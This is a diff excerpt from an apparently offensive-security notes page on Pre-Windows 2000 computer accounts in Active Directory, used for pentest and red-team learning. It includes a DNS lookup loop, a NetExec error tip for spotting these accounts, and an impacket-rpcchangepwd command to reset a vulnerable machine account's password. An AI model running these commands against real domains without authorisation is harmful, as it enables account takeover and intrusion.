stellastrareviews/ky4meru.github.io/docs/active-directory/compatibility.md

 for IP in $(cat ComputersIPs.txt); do host $IP $DNSServer; done > ComputerNames.txt
 ```

-Once you identify a vulnerable domain computer, you will certainly have to change its password.
+If you are using [NetExec](https://github.com/Pennyw0rth/NetExec), authentication attempts with error `WORKSTATION_TRUST_ACCOUNT` mean it is a Pre-Windows 2000 computer.
+Once you identify a vulnerable domain machine account, you will have to change its password.
 You can do it using [impacket-rpcchangepwd](https://github.com/fortra/impacket/pull/1304/commits/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6).

 ```bash
 impacket-rpcchangepwd $Domain/$ComputerName$:$ComputerNameInLowerCase@$DomainControllerIP -newpass $NewPassword